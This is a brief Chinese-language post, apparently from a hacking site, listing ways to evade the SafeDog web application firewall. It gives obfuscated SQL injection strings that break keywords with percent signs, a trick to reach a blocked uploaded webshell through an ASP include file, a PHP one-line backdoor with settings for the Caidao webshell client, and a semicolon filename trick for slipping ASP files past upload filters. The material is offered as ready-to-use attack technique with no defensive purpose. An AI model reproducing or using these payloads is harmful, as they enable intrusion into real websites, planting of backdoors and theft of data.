过安全狗的一些方法
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
(貌似被用烂了)
方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect
1,2,3,4 fr%aom admin
2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://www.xksafe.com/dama.asp 访问后出现拦截。
那么解决方法 在同目录上传个文件da.asp 内容为: <!--#include
file="dama.asp" --> 这样再访问da.asp 就不会被拦截了。 (利用包含文件)
3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:中转下连接菜刀,把过滤掉的词替换掉。
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
菜刀里写:http://localhost/1.php?2=assert
密码:1
4.过1.asp;.jpg这样的文件拦截
方法一:;1.asp;.jpg
www.xksafe.com